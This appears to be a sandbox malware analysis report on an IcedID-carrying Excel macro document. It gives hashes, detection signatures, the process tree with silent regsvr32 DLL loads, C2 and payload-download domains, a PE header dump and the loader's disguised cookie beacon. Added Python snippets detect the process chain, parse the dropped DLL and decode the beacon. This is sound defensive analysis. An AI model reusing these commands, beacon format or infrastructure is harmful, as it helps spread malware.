
Windows Analysis Report Outfordelivery389402.xlsm

Overview

General Information

Sample Name: Outfordelivery389402.xlsm
Analysis ID: 444803
MD5: acdff723834c2096a2b6cf764530a39d
SHA1: f73118a481aff1b466d3357ed80ad5dda7bdb082
SHA256: 236813afbb9c8784ac18f4653ee4933de94941b17cce4dad97ed1f21d61eb5b1
Tags: IcedID, xlsm

Detection

IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapter information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2640 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2824 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2828 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2428 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author
dump.pcap | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security

Memory Dumps

Source | Rule | Description | Author
00000004.00000002.2096505255.0000000000190000.00000004.00000001.sdmp | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
  Strings:
  • 0x27c6:$internal_name: loader_dll_64.dll
  • 0x30b4:$string0: _gat=
  • 0x3114:$string1: _ga=
  • 0x30ec:$string2: _gid=
  • 0x30cc:$string3: _u=
  • 0x3026:$string4: _io=
  • 0x30d8:$string5: GetAdaptersInfo
  • 0x2b16:$string6: WINHTTP.dll
  • 0x27ea:$string7: DllRegisterServer
  • 0x27fc:$string8: PluginInit
  • 0x3080:$string9: POST
  • 0x3140:$string10: aws.amazon.com
00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security
00000004.00000002.2100767048.0000000003401000.00000004.00000001.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security
00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security
Process Memory Space: regsvr32.exe PID: 2828 | JoeSecurity_IcedID_1 | Yara detected IcedID | Joe Security

Unpacked PEs

Source | Rule | Description | Author
4.2.regsvr32.exe.4d0000.1.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
  Strings:
  • 0x27c6:$internal_name: loader_dll_64.dll
  • 0x30bc:$string0: _gat=
  • 0x311c:$string1: _ga=
  • 0x30f4:$string2: _gid=
  • 0x30d4:$string3: _u=
  • 0x302e:$string4: _io=
  • 0x30e0:$string5: GetAdaptersInfo
  • 0x2b16:$string6: WINHTTP.dll
  • 0x27ea:$string7: DllRegisterServer
  • 0x27fc:$string8: PluginInit
  • 0x3088:$string9: POST
  • 0x3148:$string10: aws.amazon.com
4.2.regsvr32.exe.190000.0.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
  Strings:
  • 0x1bc6:$internal_name: loader_dll_64.dll
  • 0x1f16:$string6: WINHTTP.dll
  • 0x1bea:$string7: DllRegisterServer
  • 0x1bfc:$string8: PluginInit
4.2.regsvr32.exe.190000.0.raw.unpack | MAL_IcedID_GZIP_LDR_202104 | 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Thomas Barabosch, Telekom Security
  Strings:
  • 0x27c6:$internal_name: loader_dll_64.dll
  • 0x30b4:$string0: _gat=
  • 0x3114:$string1: _ga=
  • 0x30ec:$string2: _gid=
  • 0x30cc:$string3: _u=
  • 0x3026:$string4: _io=
  • 0x30d8:$string5: GetAdaptersInfo
  • 0x2b16:$string6: WINHTTP.dll
  • 0x27ea:$string7: DllRegisterServer
  • 0x27fc:$string8: PluginInit
  • 0x3080:$string9: POST
  • 0x3140:$string10: aws.amazon.com

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data:
  Command: regsvr32 -silent ..\XRAY.dll
  CommandLine: regsvr32 -silent ..\XRAY.dll
  CommandLine|base64offset|contains: ,
  Image: C:\Windows\System32\regsvr32.exe
  NewProcessName: C:\Windows\System32\regsvr32.exe
  OriginalFileName: C:\Windows\System32\regsvr32.exe
  ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  ParentProcessId: 2640
  ProcessCommandLine: regsvr32 -silent ..\XRAY.dll
  ProcessId: 2824
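The Sigma hit above is a parent/child relationship: an Office binary starting one of a fixed list of script hosts and LOLBins. The Python below is an added example (not Joe Sandbox's code and not the Sigma project's rule) that re-implements that logic over Sysmon-style process-creation events and adds a second, narrower check for what this sample actually does: regsvr32 silently registering a DLL from a relative (..\) or user-profile path, matching the XRAY.dll / XTOWN.dll / XZIBIT.dll loads in the process tree and the drop location C:\Users\user\. The parent and child image lists are a subset of the public Sigma rule's, the event field names are assumed to follow Sysmon, and the events are constructed: two mirror PIDs 2824 and 2828 from the report, two are benign-looking decoys.

```python
"""Re-implementation of the Sigma logic behind "Microsoft Office Product
Spawning Windows Shell", plus a narrower check for the silent regsvr32 DLL
load seen in this report, run over Sysmon-style process-creation events."""
import re

# Image names, a subset of those in the public Sigma rule (assumption: the
# real rule carries longer parent and child lists than reproduced here).
OFFICE_PARENTS = ("\\winword.exe", "\\excel.exe", "\\powerpnt.exe", "\\msaccess.exe",
                  "\\mspub.exe", "\\visio.exe", "\\outlook.exe", "\\onenote.exe")
SHELL_CHILDREN = ("\\cmd.exe", "\\powershell.exe", "\\wscript.exe", "\\cscript.exe",
                  "\\mshta.exe", "\\rundll32.exe", "\\regsvr32.exe", "\\msiexec.exe",
                  "\\wmic.exe", "\\schtasks.exe")

# A regsvr32 switch beginning with "s": covers the documented /s as well as the
# "-silent" spelling in this report's command lines.
SILENT_SWITCH = re.compile(r"(?:^|\s)[-/]s\w*(?=\s|$)", re.IGNORECASE)
# DLL path under the user's control: "..\" traversal (the sample's form, with the
# DLLs landing in C:\Users\user\), an explicit \Users\ path, or a profile variable.
USER_WRITABLE_PATH = re.compile(
    r"\.\.\\|\\Users\\|%(?:USERPROFILE|APPDATA|LOCALAPPDATA|TEMP|TMP)%", re.IGNORECASE)


def office_spawns_shell(event):
    """Sigma selection: Office parent AND shell/LOLBin child (case-insensitive suffix match)."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    return parent.endswith(OFFICE_PARENTS) and image.endswith(SHELL_CHILDREN)


def regsvr32_silent_user_dll(event):
    """regsvr32 registering a DLL silently from a user-writable location."""
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "")
    return (image.endswith("\\regsvr32.exe")
            and SILENT_SWITCH.search(cmdline) is not None
            and USER_WRITABLE_PATH.search(cmdline) is not None)


RULES = {"office_spawns_shell": office_spawns_shell,
         "regsvr32_silent_user_dll": regsvr32_silent_user_dll}


def evaluate(events):
    """Return {ProcessId: [rule names that fired]} for events with at least one hit."""
    hits = {}
    for event in events:
        fired = [name for name, rule in RULES.items() if rule(event)]
        if fired:
            hits[event["ProcessId"]] = fired
    return hits


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
REGSVR32 = r"C:\Windows\System32\regsvr32.exe"

# Constructed events.  The first two mirror PIDs 2824 and 2828 from the report's
# process tree; the last two are benign-looking decoys that must not fire.
SAMPLE_EVENTS = [
    {"ProcessId": 2824, "ParentProcessId": 2640, "Image": REGSVR32, "ParentImage": EXCEL,
     "CommandLine": r"regsvr32 -silent ..\XRAY.dll"},
    {"ProcessId": 2828, "ParentProcessId": 2640, "Image": REGSVR32, "ParentImage": EXCEL,
     "CommandLine": r"regsvr32 -silent ..\XTOWN.dll"},
    {"ProcessId": 3100, "ParentProcessId": 2640, "Image": r"C:\Windows\splwow64.exe",
     "ParentImage": EXCEL, "CommandLine": "splwow64.exe 12288"},
    {"ProcessId": 3204, "ParentProcessId": 1480, "Image": REGSVR32,
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\Tool\vendor.dll"'},
]

if __name__ == "__main__":
    for pid, fired in evaluate(SAMPLE_EVENTS).items():
        print(pid, fired)
```

Run stand-alone it reports PIDs 2824 and 2828 with both rule names and stays silent on the decoys. The second rule is the more specific one: Office starting regsvr32 is already unusual, but regsvr32 silently loading a DLL from a relative or profile path is the exact step at which this document hands control to the IcedID loader, so it is worth alerting on even when the parent is not an Office process.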

            Jbx Signature Overview


            AV Detection:

Found malware configuration
Source: 4.2.regsvr32.exe.4d0000.1.unpack | Malware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
Yara detected IcedID
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2100767048.0000000003401000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2828, type: MEMORY
Source: unknown | HTTPS traffic detected: 13.224.92.73:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

            Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XTOWN.dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: lsdfik[1].fml.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic | DNS query: name: thousandsyears.download
Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 13.224.92.73:443
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 172.67.198.51:80

            Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: astrocycle.download
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Tue, 06 Jul 2021 15:43:24 GMT
  Content-Type: application/octet-stream
  Content-Length: 57856
  Connection: keep-alive
  Content-Disposition: attachment; filename=lsdfik.fml
  Cache-Control: max-age=14400
  CF-Cache-Status: HIT
  Age: 6412
  Accept-Ranges: bytes
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=VYaHfTaTiGvO95MRIBYQi4x1j395FG8acrj4SxWRfuhJlpNjHQS1wbSNoWu%2B%2FJ4VVWSMsUkTlyAD%2FsD32Y%2BUigC9j4pL79FSATfy%2BIIFVKs9%2BlkJ1QKyieO%2B%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 66a9f2d40e9f2c22-FRA
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
  Data Raw:
    4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00
    b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00
    0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68
    69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
    74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20
    6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
    09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94
    3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94
    4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94
    e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94
    00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00
    86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20
    0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00
    20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00
    00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00
    06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00
    f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00
    00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00
    00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00
    a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00
    00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00
    00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00
    7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40
    2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00
    00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00
    cc 00 00 00
  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@
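The "Data Raw" bytes above are the start of the 57,856-byte body served as lsdfik.fml. The Python below is an added example (it is not part of the report and not Joe Sandbox code) that parses that captured fragment as a PE header, which is how an analyst confirms the report's "content does not match file extension" and "Office process drops PE file" findings from the wire data alone. Everything it reads comes from the captured bytes; the one assumption is in predicted_file_size(), which rounds the truncated last section's VirtualSize up to FileAlignment to estimate the full file length.

```python
"""Parse the PE header fragment captured in the HTTP response that delivered
lsdfik.fml, to show what the ".fml" file really is."""
import struct
from datetime import datetime, timezone

# First 596 bytes of the response body, copied from the report's "Data Raw"
# field; the capture stops inside the fourth section header.
CAPTURED_HEX = """
4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 c8000000
0e1fba0e 00b409cd 21b8014c cd215468 69732070 726f6772 616d2063 616e6e6f
74206265 2072756e 20696e20 444f5320 6d6f6465 2e0d0d0a 24000000 00000000
098ff1c7 4dee9f94 4dee9f94 4dee9f94 3e8c9e95 4eee9f94 4dee9e94 4bee9f94
4dee9f94 49ee9f94 e8879f95 4cee9f94 e8879d95 4cee9f94 52696368 4dee9f94
00000000 00000000 50450000 64860400 8606e460 00000000 00000000 f0002220
0b020000 003a0000 00a40000 00000000 20130000 00100000 00000080 01000000
00100000 00020000 06000000 00000000 06000000 00000000 00100100 00040000
f8ba0100 01006001 00001000 00000000 00100000 00000000 00001000 00000000
00100000 00000000 00000000 10000000 a0ec0000 fc000000 9ced0000 28000000
00000000 00000000 00000100 cc000000 00000000 00000000 00000000 00000000
00eb0000 1c000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00500000 40000000 00000000 00000000
00000000 00000000 00000000 00000000 2e746578 74000000 28380000 00100000
003a0000 00040000 00000000 00000000 00000000 20000060 2e726461 74610000
7e9e0000 00500000 00a00000 003e0000 00000000 00000000 00000000 40000040
2e646174 61000000 60000000 00f00000 00020000 00de0000 00000000 00000000
00000000 400000c0 2e706461 74610000 cc000000
"""
CAPTURED = bytes.fromhex(CAPTURED_HEX)

IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_DLL = 0x2000
PE32PLUS_MAGIC = 0x20B
SECTION_HEADER_SIZE = 40


def parse_pe_header(data):
    """DOS header -> PE signature -> COFF header -> PE32+ optional header ->
    section table.  Raises ValueError if the buffer is not a PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    (machine, n_sections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic, linker_major, linker_minor = struct.unpack_from("<HBB", data, opt)
    if magic != PE32PLUS_MAGIC:
        raise ValueError(f"not PE32+ (magic 0x{magic:x})")
    entry_point = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    file_alignment = struct.unpack_from("<I", data, opt + 36)[0]
    checksum, subsystem, dll_chars = struct.unpack_from("<IHH", data, opt + 64)
    export_rva, export_size = struct.unpack_from("<II", data, opt + 112)  # data directory 0

    sections, partial = [], None
    table = opt + opt_size
    for i in range(n_sections):
        off = table + i * SECTION_HEADER_SIZE
        if off + SECTION_HEADER_SIZE > len(data):       # header cut off by the capture
            if off + 12 <= len(data):                    # name + VirtualSize survived
                name, vsize = struct.unpack_from("<8sI", data, off)
                partial = {"name": name.rstrip(b"\0").decode("ascii"), "virtual_size": vsize}
            break
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "virtual_size": vsize,
                         "virtual_address": va, "raw_size": raw_size, "raw_ptr": raw_ptr,
                         "characteristics": struct.unpack_from("<I", data, off + 36)[0]})
    return {
        "machine": machine, "is_64bit": machine == IMAGE_FILE_MACHINE_AMD64,
        "is_executable_image": bool(characteristics & IMAGE_FILE_EXECUTABLE_IMAGE),
        "is_dll": bool(characteristics & IMAGE_FILE_DLL), "characteristics": characteristics,
        "compiled_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "linker_version": (linker_major, linker_minor), "entry_point": entry_point,
        "image_base": image_base, "file_alignment": file_alignment, "checksum": checksum,
        "subsystem": subsystem, "dll_characteristics": dll_chars,
        "export_dir": (export_rva, export_size), "num_sections": n_sections,
        "sections": sections, "partial_section": partial, "truncated": len(sections) < n_sections,
    }


def align_up(value, alignment):
    return (value + alignment - 1) // alignment * alignment


def predicted_file_size(hdr):
    """End of the last complete section plus the truncated section's VirtualSize
    rounded to FileAlignment.  Assumption: the last section's SizeOfRawData equals
    its aligned VirtualSize, which holds for ordinary linker output."""
    end = max(s["raw_ptr"] + s["raw_size"] for s in hdr["sections"])
    if hdr["partial_section"]:
        end += align_up(hdr["partial_section"]["virtual_size"], hdr["file_alignment"])
    return end


if __name__ == "__main__":
    hdr = parse_pe_header(CAPTURED)
    for key in ("machine", "is_dll", "compiled_utc", "entry_point", "image_base", "subsystem",
                "dll_characteristics", "export_dir", "sections", "partial_section"):
        print(f"{key}: {hdr[key]!r}")
    print(f"predicted file size: {predicted_file_size(hdr)} bytes")
```

What the fragment yields: an AMD64 PE32+ with Characteristics 0x2022 (EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE | DLL), so the ".fml" is a 64-bit DLL, which is why the document hands it to regsvr32; a link timestamp of 2021-07-06 07:30:14 UTC, the same day the Date header shows it being served; an export directory at RVA 0xECA0 inside .rdata, consistent with the DllRegisterServer and PluginInit names the Yara rule matches; Subsystem 1 with linker version 0.0, which is not what a stock compiler tool-chain emits; and a predicted length of 0xE200 = 57856 bytes, exactly the Content-Length logged above.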
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Connection: Keep-Alive
  Cookie: __gads=3565085024:1:7204:49; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=333637373036:416C627573:42414433343246413734333930453842; __io=0; _gid=67AFEDC5AC03
  Host: astrocycle.download
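The request above is the loader's first beacon: a bare GET / whose only payload is a Cookie header with names that imitate Google Analytics cookies. The Python below is an added example (not from the report or Joe Sandbox) that restores the request, parses it and the cookie, decodes the hex-encoded fields and applies a detection heuristic built only from what the report logs (GET / with no User-Agent and no Accept header, carrying exactly this cookie set). The report confirms only that the first __gads field is the Campaign ID (3565085024 in the extracted configuration); the meanings attached to _gat, _u and _gid follow public IcedID write-ups and are assumptions, marked as such in the code.

```python
"""Dissect the first-stage IcedID loader beacon: a bare GET / whose payload is
a Cookie header shaped like Google Analytics cookies."""

# The request as logged in the report, with CRLFs restored (constructed from
# the single fused line in the report).
RAW_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Cookie: __gads=3565085024:1:7204:49; _gat=6.1.7601.64; _ga=1.329303.0.5; "
    "_u=333637373036:416C627573:42414433343246413734333930453842; __io=0; "
    "_gid=67AFEDC5AC03\r\n"
    "Host: astrocycle.download\r\n"
    "\r\n"
)

BEACON_COOKIE_NAMES = {"__gads", "_gat", "_ga", "_u", "__io", "_gid"}


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, {lower-case header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookie(header_value):
    """'a=1; b=2' -> {'a': '1', 'b': '2'}; values may contain ':' and '='."""
    cookies = {}
    for item in header_value.split(";"):
        name, _, value = item.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def hexstr(h):
    return bytes.fromhex(h).decode("ascii", errors="replace")


def decode_beacon(cookies):
    """Decode the loader's cookie fields.  Only the first __gads field is confirmed
    by the report (it equals the extracted Campaign ID); the labels on the other
    fields follow public IcedID write-ups and are assumptions."""
    gads = cookies["__gads"].split(":")
    gid = cookies.get("_gid", "")
    return {
        "campaign_id": int(gads[0]),
        "gads_tail": gads[1:],                        # remaining __gads fields, left raw
        "os_version": cookies.get("_gat"),            # assumed: Windows major.minor.build.bits
        "ga": cookies.get("_ga"),                     # left raw
        "u_decoded": [hexstr(p) for p in cookies["_u"].split(":")],  # hex-encoded host strings
        "io": cookies.get("__io"),                    # left raw
        "gid_mac": ":".join(gid[i:i + 2] for i in range(0, len(gid), 2)),  # assumed: adapter MAC
    }


def looks_like_icedid_beacon(method, path, headers):
    """Heuristic grounded in the logged request: GET / with no User-Agent or Accept
    header and the full analytics-style cookie set."""
    cookies = parse_cookie(headers.get("cookie", ""))
    return (method == "GET" and path == "/"
            and "user-agent" not in headers and "accept" not in headers
            and BEACON_COOKIE_NAMES <= set(cookies))


if __name__ == "__main__":
    method, path, headers = parse_request(RAW_REQUEST)
    print(looks_like_icedid_beacon(method, path, headers))
    print(decode_beacon(parse_cookie(headers["cookie"])))
```

The decoded _u field is three hex-encoded printable strings, and _gid decodes to six bytes in MAC-address form, which lines up with the GetAdaptersInfo import the Yara rule matches and the "query network adapter information" signature. The heuristic deliberately keys on the absence of a User-Agent (the report's "HTTP GET or POST without a user agent" signature) rather than on the C2 host name, so it keeps firing when the campaign rotates domains.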
Source: Joe Sandbox View | IP Address: 172.67.198.51
Source: Joe Sandbox View | IP Address: 13.224.92.73
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic | HTTP traffic detected:
  GET /div/44376,8555986111.jpg HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: thousandsyears.download
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /div/44376,8555986111.jpg HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: voopeople.fun
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /div/44376,8555986111.jpg HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: uppercilio.fun
  Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1E52D1C.png
Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
Source: regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: thousandsyears.download
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 06 Jul 2021 15:43:28 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=vMdMK1HG5M0SJ%2FFEEBsIzCUz7xVitHncPf0wKxa%2FaVhf%2F%2Fr8iNE7uf73xwHwcU1zE%2FMreObfjJ3efAEhIRirQq9v14X%2B9fRcqhL0kb9Jdtp%2Bo6vgu5SI%2BcETYhyFRcPyIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 66a9f2e779594a61-FRA
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
